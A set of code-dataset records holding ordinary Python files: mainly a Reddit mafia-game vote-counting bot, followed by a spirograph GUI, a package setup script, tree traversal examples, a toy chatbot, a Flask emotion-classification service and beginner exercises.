threshold\":\n l.info(\"Command: new vote threshold\")\n try:\n threshold = int(pm.body)\n except ValueError:\n l.warn(\"Invalid number given for vote threshold: {}\".format(pm.body))\n new_state['vote_threshold'] = threshold\n\n new_state['alive_players'] = list(alive_players)\n new_state['dead_players'] = list(dead_players)\n new_state['voteless_players'] = list(voteless_players)\n if most_recent_id:\n new_state['most_recent_pm_id'] = most_recent_id\n l.debug(\"Done processing commands, updating state\")\n self.state = new_state\n\n def get_bot_post(self, submission_url, tag = None):\n l.debug(\"Fetching submission from {}\".format(submission_url))\n submission = praw.objects.Submission.from_url(self.reddit, submission_url)\n l.debug(\"Got submission\")\n comment_to_update = None\n for comment in all_comments(submission.comments):\n if comment.author and comment.author.name == self.bot_username:\n if tag is None:\n comment_to_update = comment\n break\n else:\n if comment.body.lower().find('###{}###'.format(tag.lower())) != -1:\n comment_to_update = comment\n break\n\n if comment_to_update:\n l.debug(\"Got comment\")\n return 
submission, comment_to_update\n\n def get_votes(self, vote_post, target_player, old_votes, deadline, get_vote = get_vote_from_post):\n valid_names = {x.lower() for x in self.state['alive_players']}\n #can_vote = valid_names.difference({x.lower() for x in state['voteless_players']})\n can_vote = valid_names\n votes = {}\n for vote_comment in all_comments(vote_post.replies):\n if not vote_comment.author:\n continue\n vote_result = get_vote(vote_comment.body_html)\n if vote_result is None:\n if vote_comment.id not in self.known_invalid_votes:\n l.warn(\"Did not get vote result from {}\".format(vote_comment.body_html.encode('ascii', errors='ignore')))\n self.known_invalid_votes.add(vote_comment.id)\n continue\n\n caster = vote_comment.author.name.lower()\n if caster not in can_vote:\n if vote_comment.id not in self.known_invalid_votes:\n #voteless is kinda-secret\n if caster not in valid_names:\n l.info(\"{} cannot vote ({} can)!\".format(caster, valid_names))\n self.known_invalid_votes.add(vote_comment.id)\n continue\n\n #Try to find the time the vote was cast\n timestamp = get_edited_time(vote_comment)\n\n #If the comment was edited, but the vote wasn't changed, count the time\n #as the time of the original vote\n if caster in old_votes:\n old_vote = old_votes[caster]\n if old_vote[\"lynch\"] == vote_result:\n timestamp = old_vote[\"timestamp\"]\n\n if deadline and timestamp > deadline:\n continue\n\n #if multiple votes are present, count the latest one\n if (caster not in votes) or votes[caster]['timestamp'] > timestamp:\n votes[caster] = {\"for\" : target_player,\n #Confusing terminology: in nomination games,\n #'lynch' is a bool. In tradition games, it is a\n #string with the same meaning as 'for in nomination\n #games. 'for' is None in traditional games\n \"lynch\" : vote_result,\n \"timestamp\": timestamp}\n\n return votes\n\n def sort_nominations(self, post_state):\n def votes(nominee):\n vote_info = post_state['current_votes'][nominee].values()\n votes = [v['lynch'] for v in vote_info if v['timestamp'] < deadline]\n yays = sum(votes)\n nays = len(votes) - yays\n return yays, nays\n deadline = post_state['deadline'] if post_state['deadline'] else float('Inf')\n sorted_nominations = post_state['current_nominations'].items()\n sorted_nominations.sort(key = lambda x: (x[0] not in self.state['dead_players'],\n votes(x[0])[1] - votes(x[0])[0],\n x[1]['timestamp']))\n n_trials = 0\n nominations = []\n for nominee, nomination in sorted_nominations:\n yays, nays = votes(nominee)\n up_for_trial = nominee not in self.state['dead_players'] and n_trials < self.max_trials and yays > nays\n if up_for_trial:\n n_trials += 1\n nominations.append(Nomination(player = nominee,\n yays = yays,\n nays = nays,\n up_for_trial = up_for_trial,\n vote_post_id = nomination['ack_id'],\n timestamp = nomination['timestamp']))\n\n nominations.sort(key = lambda x: (not bool(x.yays + x.nays), x.timestamp))\n\n return nominations\n\n def fix_case(self, username):\n if username in self.state['name_case_cache']:\n return self.state['name_case_cache'][username]\n\n l.debug(\"Finding proper name for {}\".format(username))\n try:\n user = praw.objects.Redditor(self.reddit, username)\n except requests.HTTPError:\n l.warn(\"Username {} doesn't appear to exist!\".format(username))\n self.state['name_case_cache'][username] = username\n return username\n #there should be a better way...\n try:\n comment = user.get_comments().next()\n except:\n comment = None\n if not comment:\n l.warn(\"No comments by {}? 
can't work out their proper name!\".format(username))\n self.state['name_case_cache'][username] = username\n return username\n l.debug(\"{} -> {}\".format(username, comment.author.name))\n self.state['name_case_cache'][username] = comment.author.name\n return comment.author.name\n\n def update_post(self, submission, post, post_template, target = None):\n l.debug(\"Updating post from template {}\".format(post_template))\n if submission:\n with open(post_template) as post_template_fd:\n template = simpletemplate.SimpleTemplate(post_template_fd.read())\n post_contents = template.render(state = self.state, target = target,\n sort_nominations = self.sort_nominations,\n time = timestamp_to_date,\n post = post,\n output_url = self.args.output_url,\n fix_case = self.fix_case,\n args = self.args)\n\n if not post:\n l.info(\"Making new post\")\n if not args.dry_run:\n submission.add_comment(post_contents)\n l.info(post_contents)\n else:\n if post.body.strip() != post_contents.strip():\n l.info(\"Updating post\")\n if not args.dry_run:\n post.edit(post_contents)\n l.info(post_contents)\n\n l.debug(\"Done updating post\")\n\n def update_log(self, filename, post, template):\n l.debug(\"Updating logfile {}\".format(filename))\n if args.dry_run:\n return\n with open(template) as template_fd:\n template = simpletemplate.SimpleTemplate(template_fd.read())\n contents = template.render(state = self.state, post = post,\n time = timestamp_to_date,\n fix_case = self.fix_case,\n args = self.args)\n with open(os.path.join(self.args.output_dir, filename), 'w') as log_fd:\n log_fd.write(contents)\n\n def load_state(self, state_filename):\n try:\n with open(state_filename) as state_fd:\n self.state = json.load(state_fd, object_hook = Tree)\n except IOError:\n pass\n\n if self.state['game_type'] and self.state['game_type'] != self.args.game_type:\n raise RuntimeError(\"Wrong game type for state! 
state is {}, we're running {}\".format(state['game_type'], self.args.game_type))\n\n self.state['game_type'] = self.args.game_type\n\n\n def save_state(self, state_filename):\n if not state_filename:\n return\n with open(state_filename, 'w') as state_fd:\n json.dump(self.state, state_fd, indent=2)\n\nclass NominationBot(VoteBot):\n def acknowledge_nomination(self, comment, target):\n for potential_bot_comment in all_comments(comment.replies):\n if potential_bot_comment.author.name == self.bot_username:\n #TODO: more checking here\n l.debug(\"Found old acknowledge post for {}\".format(target))\n return potential_bot_comment\n with open('nomination_ack.template') as post_template_fd:\n template = simpletemplate.SimpleTemplate(post_template_fd.read())\n post_contents = template.render(state = self.state, target = target, fix_case = self.fix_case)\n l.info(\"Acknowledging nomination for {}\".format(target))\n if args.dry_run:\n return None\n else:\n return comment.reply(post_contents)\n\n def get_nominations(self, nomination_post):\n l.debug(\"Counting nominations\")\n new_state = copy.deepcopy(self.state)\n valid_names = {x.lower() for x in self.state['alive_players']}\n #TODO: voteless does not affect nominations currently.\n nomination_state = new_state['nominations'][nomination_post.id]\n nomination_state['deadline'] = new_state['nominations_ended_at']\n nominations = nomination_state['current_nominations']\n for nomination_comment in all_comments(nomination_post.replies):\n nominee = get_nomination_from_post(nomination_comment.body_html, valid_names)\n if not nominee:\n continue\n if not nomination_comment.author:\n continue\n caster = nomination_comment.author.name.lower()\n if caster not in valid_names:\n if nomination_comment not in known_invalid_votes:\n l.info(\"{} cannot nominate ({} can)!\".format(caster, valid_names))\n known_invalid_votes.add(nomination_comment.id)\n continue\n\n if nominee in nominations:\n continue\n\n #Try to find the time the nomination was made\n timestamp = get_edited_time(nomination_comment)\n\n if self.state['nominations_ended_at'] and timestamp > self.state['nominations_ended_at']:\n continue\n\n ack = self.acknowledge_nomination(nomination_comment, nominee)\n vote_history = nomination_state.get('vote_history', [])\n if not vote_history:\n vote_history = []\n vote_history.append({\"action\": \"nominated\",\n \"by\": caster,\n \"on\": nominee,\n \"time\": timestamp})\n nomination_state['vote_history'] = vote_history\n\n nominations[nominee] = {\"by\" : caster,\n \"timestamp\": timestamp,\n \"ack_id\": ack.id,\n \"for\" : nominee}\n\n by_acks_id = {}\n\n for nominee, nomination in nominations.items():\n by_acks_id[nomination['ack_id']] = nomination\n\n for nomination_comment in all_comments(nomination_post.replies):\n for ack_comment in all_comments(nomination_comment.replies):\n if ack_comment.id in by_acks_id:\n nomination = by_acks_id[ack_comment.id]\n nominee = nomination['for']\n old_votes = copy.deepcopy(nomination_state['current_votes'][nominee])\n votes = self.get_votes(ack_comment, nominee, old_votes, self.state['nominations_ended_at'])\n nomination_state['current_votes'][nominee] = votes\n additions, removals = compare_dicts(old_votes, votes)\n vote_history = nomination_state.get('vote_history', [])\n if not vote_history:\n vote_history = []\n for voter, vote in additions.items():\n vote_history.append({\"action\" : \"vote\",\n \"lynch\" : vote['lynch'],\n \"by\" : voter,\n \"for\" : vote['for'],\n \"time\" : vote['timestamp']})\n for voter, vote 
in removals.items():\n timestamp = votes[voter]['timestamp'] if voter in votes else int(time.time())\n vote_history.append({\"action\" : \"unvote\",\n \"lynch\" : vote['lynch'],\n \"by\" : voter,\n \"for\" : vote['for'],\n \"time\" : timestamp})\n nomination_state['vote_history'] = vote_history\n break\n\n if new_state['nominations_ended_at']:\n new_state['counting_nominations'] = False\n self.state = new_state\n l.debug(\"Done counting nominations\")\n\n def update_state(self):\n self.process_commands()\n if self.state['nominations_url'] and self.state['counting_nominations']:\n nomination_submission, nomination_post = self.get_bot_post(self.state['nominations_url'], 'nominate')\n if nomination_post:\n self.get_nominations(nomination_post)\n self.update_log('{}_history.txt'.format(nomination_post.id),\n nomination_post, 'vote_history.template')\n self.update_log('{}_votes.txt'.format(nomination_post.id),\n nomination_post, 'nomination_state.template')\n self.update_post(nomination_submission, nomination_post, 'nomination_post.template',\n target=nomination_post.id if nomination_post else None)\n\n if self.state['votes_url'] and self.state['counting_votes']:\n for nominee in self.state['nominated_players']:\n votes_submission, votes_post = self.get_bot_post(self.state['votes_url'], 'vote ' + nominee)\n if votes_post:\n self.count_votes(votes_post, nominee)\n self.update_log('{}_history.txt'.format(votes_post.id),\n votes_post, 'vote_history.template')\n self.update_log('{}_votes.txt'.format(votes_post.id),\n votes_post, 'vote_state.template')\n self.update_post(votes_submission, votes_post, 'vote_post.template', nominee)\n if self.state['votes_ended_at']:\n self.state['counting_votes'] = False\n\n def count_votes(self, vote_post, nominee):\n l.debug(\"Counting votes\")\n new_state = copy.deepcopy(self.state)\n old_votes = self.state['votes'][vote_post.id]['current_votes']\n votes_state = new_state['votes'][vote_post.id]\n votes = self.get_votes(vote_post, nominee, old_votes, self.state['votes_ended_at'])\n\n additions, removals = compare_dicts(old_votes, votes)\n vote_history = votes_state.get('vote_history', [])\n if not vote_history:\n vote_history = []\n for voter, vote in additions.items():\n vote_history.append({\"action\" : \"vote\",\n \"lynch\" : vote['lynch'],\n \"by\" : voter,\n \"for\" : vote['for'],\n \"time\" : vote['timestamp']})\n for voter, vote in removals.items():\n timestamp = votes[voter]['timestamp'] if voter in votes else int(time.time())\n vote_history.append({\"action\" : \"unvote\",\n \"lynch\" : vote['lynch'],\n \"by\" : voter,\n \"for\" : vote['for'],\n \"time\" : timestamp})\n\n votes_state['vote_history'] = vote_history\n votes_state['current_votes'] = votes\n\n self.state = new_state\n l.debug(\"Done counting votes\")\n\n\nclass TraditionalBot(VoteBot):\n def update_state(self):\n self.process_commands()\n self.state['name_case_cache']['no lynch'] = 'No Lynch'\n if self.state['votes_url']:\n vote_submission, vote_post = self.get_bot_post(self.state['votes_url'], 'vote')\n if vote_post:\n self.count_votes(vote_post)\n self.update_log('{}_history.txt'.format(vote_post.id),\n vote_post, 'vote_history_traditional.template')\n self.update_log('{}_votes.txt'.format(vote_post.id),\n vote_post, 'vote_state_traditional.template')\n\n votes = self.state['votes'][vote_post.id]['current_votes']\n vote_counts = collections.Counter([v['lynch'] for v in votes.values()])\n real_vote_counts = collections.Counter([v['lynch'] for caster, v in votes.items()\n if caster not in 
self.state['voteless_players']])\n if not self.args.secret_voteless:\n vote_counts = real_vote_counts\n vote_threshold = self.state['vote_threshold']\n if not isinstance(vote_threshold, int):\n vote_threshold = (len(self.state['alive_players']) - len(self.state['voteless_players']))/ 2 + 1\n if len(vote_counts) and real_vote_counts.most_common(1)[0][1] >= vote_threshold and not self.state['votes_ended_at'] and args.hammers:\n self.state['votes_ended_at'] = time.time()\n v_url = state['votes_url']\n self.state['votes_url'] = \"\"\n lynched_player = real_vote_counts.most_common(1)[0][0]\n for user in self.authorized_users:\n if not args.dry_run:\n self.reddit.send_message(user, \"Hammer\",\n \"The voting at {} has reached \"\n \"a majority for {} . You might want to check the voting \"\n \"history and edit times if there were a few last-minute vote changes\".format(v_url, lynched_player))\n self.update_post(vote_submission, vote_post, 'vote_post_traditional.template', None)\n self.update_log('players.txt', None, 'players.template')\n\n\n def count_votes(self, vote_post):\n l.debug(\"Counting votes\")\n new_state = copy.deepcopy(self.state)\n\n old_votes = self.state['votes'][vote_post.id]['current_votes']\n votes_state = new_state['votes'][vote_post.id]\n\n valid_names = {x.lower() for x in self.state['alive_players']}\n valid_names.add('no lynch')\n\n def get_vote(post_contents):\n res = get_nomination_from_post(post_contents, valid_names)\n return res\n\n votes = self.get_votes(vote_post, None, old_votes, self.state['votes_ended_at'], get_vote = get_vote)\n\n additions, removals = compare_dicts(old_votes, votes)\n vote_history = votes_state.get('vote_history', [])\n if not vote_history:\n vote_history = []\n for voter, vote in additions.items():\n vote_history.append({\"action\" : \"vote\",\n \"for\" : vote['lynch'],\n \"by\" : voter,\n \"time\" : vote['timestamp']})\n\n for voter, vote in removals.items():\n timestamp = votes[voter]['timestamp'] if voter in votes else int(time.time())\n vote_history.append({\"action\" : \"unvote\",\n \"for\" : vote['lynch'],\n \"by\" : voter,\n \"time\" : timestamp})\n\n votes_state['vote_history'] = vote_history\n votes_state['current_votes'] = votes\n\n self.state = new_state\n l.debug(\"Done counting votes\")\n\ndef oauth_login(r):\n r.set_oauth_app_info(client_id = creds.oauth_id,\n client_secret = creds.oauth_secret,\n redirect_uri=\"http://127.0.0.1:65010/authorize_callback\")\n url = r.get_authorize_url('PloungeMafiaVoteBot', 'identity submit privatemessages edit history read', True)\n print(url)\n key = raw_input('key>').strip()\n access_info = r.get_access_information(key)\n r.set_access_credentials(**access_info)\n return access_info\n\ndef oauth_load(r):\n r.set_oauth_app_info(client_id = creds.oauth_id,\n client_secret = creds.oauth_secret,\n redirect_uri=\"http://127.0.0.1:65010/authorize_callback\")\n with open('oauth_info.json') as access_fd:\n access_info = json.load(access_fd)\n access_info['scope'] = set(access_info['scope'])\n r.set_access_credentials(**access_info)\n return access_info\n\ndef oauth_refresh(r, access_info):\n access_info = r.refresh_access_information(access_info['refresh_token'])\n r.set_access_credentials(**access_info)\n with open('oauth_info.json', 'w') as access_fd:\n json_safe_access_info = dict(access_info)\n json_safe_access_info['scope'] = list(json_safe_access_info['scope'])\n json.dump(json_safe_access_info, access_fd, indent=2)\n return access_info\n\nif __name__ == \"__main__\":\n args = 
parser.parse_args()\n\n l.setLevel(debug_levels[args.log_level])\n l.info(\"Starting up\")\n r = praw.Reddit(user_agent = \"VoteCountBot by rcxdude\")\n\n bots = []\n last_refresh_time = None\n oauth_access_info = None\n\n\n for game in config.games:\n if game.name.lower() not in [x.lower() for x in config.enabled_games]:\n continue\n\n BotClass = {\n \"nomination\" : NominationBot,\n \"traditional\" : TraditionalBot,\n }[game.game_type]\n\n bot = BotClass(r, creds, game)\n bot.load_state(bot.args.state_file)\n bot.setup_dir()\n bots.append(bot)\n\n while True:\n l.info(\"Attempting login\")\n try:\n if args.oauth_login:\n oauth_access_info = oauth_login(r)\n else:\n oauth_access_info = oauth_load(r)\n #r.login(creds.bot_username, creds.bot_password)\n break\n except Exception as e:\n l.error(traceback.format_exc())\n time.sleep(60 * args.update_delay)\n\n oauth_access_info = oauth_refresh(r, oauth_access_info)\n last_refresh_time = time.time()\n\n l.info(\"Logged in\")\n\n while True:\n for bot in bots:\n try:\n bot.update_state()\n bot.save_state(bot.args.state_file)\n except Exception as e:\n l.error(traceback.format_exc())\n if args.oneshot:\n break\n if time.time() - last_refresh_time > 40 * 60:\n l.info(\"Refreshing OAuth information\")\n oauth_access_info = oauth_refresh(r, oauth_access_info)\n last_refresh_time = time.time()\n l.debug(\"done, sleeping for {} seconds\".format(60 * args.update_delay))\n time.sleep(60 * args.update_delay)\n","repo_name":"rcxdude/plounge_votebot","sub_path":"vote_count.py","file_name":"vote_count.py","file_ext":"py","file_size_in_byte":35977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31573183073","text":"from turtle import color\nimport PySimpleGUI as sg\nfrom spirograph import Spiro\n\n\n\nGRAPH_SIZE = (500, 500)\nDATA_SIZE = (500, 500)\n\nSIZE_X = GRAPH_SIZE[0]//2\nSIZE_Y = GRAPH_SIZE[1]//2\n\ngraph = sg.Graph(GRAPH_SIZE, (0, 0), DATA_SIZE, key='-GRAPH-', background_color='white',)\n\nlayout = [[sg.Text('enter', background_color='#FCFCFC', text_color='black')],\n [sg.Text('R', size=(15, 1), background_color='#FCFCFC',justification='right', text_color='black'), sg.Input(key='R_input', size=(15, 1))],\n [sg.Text('r', size=(15, 1), background_color='#FCFCFC', justification='right', text_color='black'), sg.Input(key='r_input', size=(15, 1))],\n [sg.Text('l', size=(15, 1), background_color='#FCFCFC', justification='right', text_color='black'), sg.Input(key='l_input', size=(15, 1))],\n [sg.Button('draw')],\n [graph]]\n \nwindow = sg.Window(title=\"spirograph\", layout=layout, background_color='#FCFCFC')\n\n\nwhile True:\n \n event, values = window.read()\n # End program if user closes window or\n # presses the OK button\n if event == sg.WIN_CLOSED:\n break\n if event is None:\n break\n if event == 'draw':\n is_animated = False\n graph.erase()\n\n #draw_axis()\n spirog = Spiro(int(values['R_input']),int(values['r_input']), float(values['l_input']), SIZE_X, SIZE_Y)\n plot = spirog.draw()\n prev_x, prev_y = None, None\n for x,y in plot:\n if prev_x is not None:\n graph.draw_line((prev_x, prev_y), (x, y), color='red')\n prev_x, prev_y = x, y\n if event == sg.WIN_CLOSED:\n break\n if event is None:\n break\n\nwindow.close()\n","repo_name":"Riivka/spirograph","sub_path":"view-GUI.py","file_name":"view-GUI.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35172696457","text":"from typing 
import List\nimport sys\nimport os\n\nVERSION = \"1.0.0\" # Remember to mirror changes on line 2 of main CMakeLists!\nTHIS_DIR = os.path.dirname(__file__)\nROOT_PACKAGE_FOLDER = \"bindings/imgui_bundle\"\nROOT_PACKAGE_NAME = \"imgui_bundle\"\n\n\ndef get_readme():\n with open(ROOT_PACKAGE_FOLDER + \"/Readme_pypi.md\", encoding=\"utf8\") as f:\n r = f.read()\n return r\n\n\ndef _get_assets_and_demos_cpp_dirs() -> List[str]:\n r = []\n\n dir_name: str\n for dir_name, subdir_list, file_list in os.walk(ROOT_PACKAGE_FOLDER):\n\n def is_assets_dir_or_subdir():\n dir_parts = dir_name.replace(\"\\\\\", \"/\").split(\"/\")\n return (\n \"assets\" in dir_parts\n or \"demos_cpp\" in dir_parts\n or \"demos_assets\"\n or \"doc\" in dir_parts\n )\n\n if is_assets_dir_or_subdir():\n relative_dir = os.path.relpath(dir_name, ROOT_PACKAGE_FOLDER)\n r.append(relative_dir)\n\n return r\n\n\ndef get_imgui_bundle_package_data() -> List[str]:\n data = [\n \"Readme.md\",\n \"LICENSE\",\n \"py.typed\",\n \"*.pyi\",\n \"*/*.pyi\",\n \"*/py.typed\",\n \"demos_python/notebooks/*.ipynb\",\n \"demos_python/demos_node_editor/demo_node_editor_basic.json\",\n ]\n for asset_dir in _get_assets_and_demos_cpp_dirs():\n data.append(asset_dir + \"/*.*\")\n return data\n\n\ndef get_imgui_bundle_packages() -> List[str]:\n r = []\n dir_name: str\n for dir_name, subdir_list, file_list in os.walk(ROOT_PACKAGE_FOLDER):\n if os.path.isfile(dir_name + \"/__init__.py\"):\n package_dir = os.path.relpath(dir_name, ROOT_PACKAGE_FOLDER)\n if package_dir == \".\":\n package_name = ROOT_PACKAGE_NAME\n else:\n package_name = ROOT_PACKAGE_NAME + \".\" + package_dir.replace(\"/\", \".\")\n r.append(package_name)\n return r\n\n\ntry:\n from skbuild import setup\nexcept ImportError:\n print(\n \"Please update pip, you need pip 10 or greater,\\n\"\n \" or you need to install the PEP 518 requirements in pyproject.toml yourself\",\n file=sys.stderr,\n )\n raise\n\nsetup(\n name=\"imgui-bundle\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: MIT License\",\n \"Topic :: Scientific/Engineering\",\n \"Typing :: Typed\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3\",\n ],\n version=VERSION,\n author=\"Pascal Thomet\",\n author_email=\"pthomet@gmail.com\",\n description=\"Dear ImGui Bundle: easily create ImGui applications in Python and C++. 
Batteries included!\",\n long_description=get_readme(),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/pthom/imgui_bundle\",\n packages=(get_imgui_bundle_packages()),\n package_dir={\"\": \"bindings\"},\n cmake_install_dir=\"bindings/imgui_bundle\",\n extras_require={\"test\": [\"pytest\"]},\n python_requires=\">=3.6\",\n package_data={\"imgui_bundle\": get_imgui_bundle_package_data()},\n install_requires=[\n \"numpy >= 1.15\",\n \"munch >= 2.0.0\",\n \"glfw > 2.5\",\n \"PyOpenGL >= 3.0\",\n \"pillow >= 9.0.0\",\n ],\n entry_points={\n \"console_scripts\": [\n \"demo_imgui_bundle=imgui_bundle.demos_python.demo_imgui_bundle:main\",\n \"imgui_bundle_demo=imgui_bundle.demos_python.demo_imgui_bundle:main\",\n ],\n },\n)\n","repo_name":"pthom/imgui_bundle","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":394,"dataset":"github-code","pt":"81"} +{"seq_id":"2351492666","text":"class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n# inorder traversal(中序遍历): left-root-right\n# will produce an ascending order of nodes\ndef inorder(node):\n # left node recursion\n if node.left:\n inorder(node.left)\n # middle node operation here\n print(node.val)\n # right node recursion\n if node.right:\n inorder(node.right)\n\n# preorder traversal(先序遍历): root-left-right\ndef preorder(node):\n # middle node operation here\n print(node.val)\n # left node recursion\n if node.left:\n preorder(node.left)\n # right node recursion\n if node.right:\n preorder(node.right)\n\n# postorder traversal(后序遍历): left-right-root\ndef postorder(node):\n # left node recursion\n if node.left:\n postorder(node.left)\n # right node recursion\n if node.right:\n postorder(node.right)\n # middle node operation here\n print(node.val)\n\n# test\n\ntree = TreeNode(4, TreeNode(2, TreeNode(1), TreeNode(3)), TreeNode(6))\n\ninorder(tree)\npreorder(tree)\npostorder(tree)\n","repo_name":"RickyWang1020/CSDSNotes","sub_path":"Python/bst_traversal.py","file_name":"bst_traversal.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34450869756","text":"import datetime\nimport random\n\n\nprint(\"this is precious, what question do you want answered today?\")\nrestaurant= [\"deplace\", \"chicken republic\", \"tantalizers\", \"Mr. 
Biggs\"]\nchurch= [\"St Josephs Catholic Church\", \"RCCG\", \"Living Faith\"]\nschool = [\"fehingbole grammer school\", \"Queens college\", \"yabatech\", \"unilag\"]\nrichest = [\"Alhaji Saheed Elon Musk\", \"Ola Cubana\", \"Shenior Man\"]\nwhile True:\n question=input()\n if \"restaurant\" in question:\n print(\"the closest restaurant to this location is\", random.choice(restaurant))\n elif \"church\" in question:\n print(\"the closest church to this location is\", random.choice(church))\n elif \"school\" in question:\n print(\"the closest school to this location is\", random.choice(school))\n elif \"date\" in question:\n print(datetime.datetime.now().today())\n \n elif \"richest\" in question:\n print(\"the richest person in cohort 8 is\", random.choice(richest))\n elif \"break\" in question:\n break\n else:\n print(\"you clown!!, ask a question I understand\")","repo_name":"everybees/parsel_tongue","sub_path":"femi/chat_bot.py","file_name":"chat_bot.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"5704787317","text":"from flask import Flask, request\nfrom flask_json import FlaskJSON, JsonError, as_json\nfrom werkzeug.utils import secure_filename\nfrom transformers import AutoModelForSequenceClassification\nfrom transformers import AutoTokenizer, AutoConfig\nimport numpy as np\nimport json\nfrom scipy.special import softmax\n\napp = Flask(__name__)\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\napp.config[\"JSON_ADD_STATUS\"] = False\napp.config[\"JSON_SORT_KEYS\"] = False\nAPP_ROOT = \"./\"\napp.config[\"APPLICATION_ROOT\"] = APP_ROOT\napp.config[\"UPLOAD_FOLDER\"] = \"files/\"\n\njson_app = FlaskJSON(app)\n\nmodel_path = \"daveni/twitter-xlm-roberta-emotion-es\"\ntokenizer = AutoTokenizer.from_pretrained(model_path)\nconfig = AutoConfig.from_pretrained(model_path)\nmodel = AutoModelForSequenceClassification.from_pretrained(model_path)\n\n# Preprocess text (username and link placeholders)\ndef preprocess(text):\n new_text = []\n for t in text.split(\" \"):\n t = \"@user\" if t.startswith(\"@\") and len(t) > 1 else t\n t = \"http\" if t.startswith(\"http\") else t\n new_text.append(t)\n return \" \".join(new_text)\n\n\ndef tokenize(text):\n text = preprocess(text)\n encoded_input = tokenizer(\n text, return_tensors=\"pt\", truncation=True, max_length=512\n )\n return encoded_input\n\n\ndef predict(encoded_input):\n output = model(**encoded_input)\n scores = output[0][0].detach().numpy()\n scores = softmax(scores)\n return scores\n\n\n@as_json\n@app.route(\"/predict_json\", methods=[\"POST\"])\ndef predict_json():\n\n data = request.get_json()\n if data[\"type\"] != \"text\":\n # Standard message code for unsupported response type\n return generate_failure_response(\n status=400,\n code=\"elg.request.type.unsupported\",\n text=\"Request type {0} not supported by this service\",\n params=[data[\"type\"]],\n detail=None,\n )\n if \"content\" not in data:\n return invalid_request_error(\n None\n )\n\n content = data.get(\"content\")\n try:\n encoded_input = tokenize(content)\n size = len(encoded_input[\"input_ids\"][0])\n scores = predict(encoded_input)\n output = generate_successful_response(scores)\n return output\n except Exception as e:\n text = (\n \"Unexpected error. 
If your input text is too long, this may be the cause.\"\n )\n # Standard message for internal error - the real error message goes in params\n return generate_failure_response(\n status=500,\n code=\"elg.service.internalError\",\n text=\"Internal error during processing: {0}\",\n params=[text],\n detail=e.__str__(),\n )\n\ndef generate_successful_response(scores):\n ranking = np.argsort(scores)\n ranking = ranking[::-1]\n\n list_clasess = list()\n for i in range(scores.shape[0]):\n list_clasess.append(\n {\"class\": config.id2label[ranking[i]], \"score\": str(scores[ranking[i]])}\n )\n response = {\"type\": \"classification\", \"classes\": list_clasess}\n output = {\"response\": response}\n return output\n\n\n@json_app.invalid_json_error\ndef invalid_request_error(e):\n \"\"\"Generates a valid ELG \"failure\" response if the request cannot be parsed\"\"\"\n raise JsonError(\n status_=400,\n failure={\n \"errors\": [\n {\"code\": \"elg.request.invalid\", \"text\": \"Invalid request message\"}\n ]\n },\n )\n\n\ndef generate_failure_response(status, code, text, params, detail):\n error = {}\n if code:\n error[\"code\"] = code\n if text:\n error[\"text\"] = text\n if params:\n error[\"params\"] = params\n if detail:\n error[\"detail\"] = {\"message\": detail}\n\n raise JsonError(status_=status, failure={\"errors\": [error]})\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8866)\n","repo_name":"Gradiant/elg_emoevales_iberlef2021","sub_path":"serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19719257090","text":"# Summary of collections.Counter:\n# https://pymotw.com/2/collections/counter.html\n# https://gist.github.com/bradmontgomery/4717521\n\nfrom collections import Counter\n\n# Need to calculate the total sum collected from shoe sales\nsum = 0\n\n# get number of shoes (X)\nX = int(input())\n\n# Create counter of all available shoe sizes\navailable_shoes = Counter(map(int, input().split(' ')))\n\n# get number of customers (N)\nN = int(input())\n\n# Work through customer orders and calculate the sum\nfor order in range(N):\n size, price = map(int, input().split(' '))\n if available_shoes[size]:\n sum += price\n available_shoes.subtract({size: 1})\n \nprint (sum)\n","repo_name":"doyleju/HR","sub_path":"collections/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34653854464","text":"#Get user input using input(“Enter your age: ”). If user is 18 or older, give feedback: You are old enough to drive. If below 18 give feedback to wait for the missing amount of years. Output: # noqa: E501\n\n# age = int(input('Enter your age): '))\n\nage = int(30)\n\nif age >= 18: # noqa: F821\n print(\"You are old enough to drive\")\nelse:\n print(f\"You need {18 - age} more years to learn to drive.\") # noqa: F821\n\n# Compare the values of my_age and your_age using if … else. Who is older (me or you)? Use input(“Enter your age: ”) to get the age as input. You can use a nested condition to print 'year' for 1 year difference in age, 'years' for bigger differences, and a custom text if my_age = your_age. 
Output: # noqa: E501\n\n# my_age = int(input(\"Enter your age\"))\n# your_age = int(input(\"Enter your age\"))\n\nmy_age, your_age = int(30), int(25)\n\nif my_age > your_age:\n print(f\"My age is greater than your age for {my_age - your_age} years\")\nelif my_age < your_age:\n print(f\"Your age is greater than my age for {your_age - my_age} years\")\nelse:\n print(\"My age and your age are equal\")\n\n# Get two numbers from the user using input prompt. If a is greater than b return a is greater than b, if a is less b return a is smaller than b, else a is equal to b. Output: # noqa: E501\n\none = int(3)\ntwo = int(4)\n\nif one > two:\n print(f\"{one} is greater than {two}\")\nelif one < two:\n print(f\"{one} is smaller than {two}\")\nelse:\n print(f\"{one} is equal to {two}\")\n\n### Exercises: Level 2\n\n# Write a code which gives grade to students according to theirs scores:\n\nnote = int(45)\n\nif note >= 90 and note <= 100:\n print(\"A\")\nelif note >= 70 and note <= 89:\n print(\"B\")\nelif note >= 60 and note <=69:\n print(\"C\")\nelif note >= 50 and note <=59:\n print(\"D\")\nelse:\n 